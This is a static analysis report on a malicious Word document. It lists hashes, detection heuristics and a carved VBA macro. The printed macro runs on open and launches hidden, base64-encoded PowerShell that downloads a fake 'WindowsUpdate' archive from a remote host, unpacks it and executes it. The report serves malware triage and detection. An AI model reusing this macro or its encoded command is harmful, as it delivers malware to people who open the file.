Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 c2934fa57c1ae00c…

MALICIOUS

Office (OLE) / .DOC

33.0 KB Created: 2026-04-10 13:13:00 Authoring application: Microsoft Office Word First seen: 2026-06-26
MD5: e4f97dce5a65c967c4875706e838e629 SHA-1: 8bf76c220ba97d8daec22635bab9123851ae0795 SHA-256: c2934fa57c1ae00c06c84c3a1f7c0b1f1244dad1cf2ca7efc9f744999935b2cf
400 Risk Score

Heuristics 13

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        CreateObject("Wscript.Shell").Run Str, 0, False
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Str = Str + "powershell.exe -nop -w hidden -e "
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        CreateObject("Wscript.Shell").Run Str, 0, False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1004 bytes
SHA-256: 112cc07181fe0e1aea883e5f9633186f3b8b5b6b50d0e72865a58afccc048feb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    AutoOpenMacro
End Sub

Sub Document_Open()
    AutoOpenMacro
End Sub

Sub AutoOpenMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -e "
    Str = Str + "YwBkACAAIgAkAGUAbgB2ADoAUABVAEIATABJAEMAXAAiADsAIAAKAGMAdQByAGwAIAAtAG8AIABXAGkAbgBkAG8AdwBzAFUAcABkAGEAdABlAC4AegBpAHAAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4ANwA0ADoAOAAwADAAMAAvAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUALgB6AGkAcAA7ACAACgB0AGEAcgAgAC0AeABmACAAVwBpAG4AZABvAHcAcwBVAHAAZABhAHQAZQAuAHoAaQBwADsACgAmACgAIgAkAGUAbgB2ADoAUAB1AGIAbABpAGMAXABXAGkAbgBkAG8AdwBzAFUAcABkAGEAdABlAC4AZQB4AGUAIgApAAoA"
    CreateObject("Wscript.Shell").Run Str, 0, False
End Sub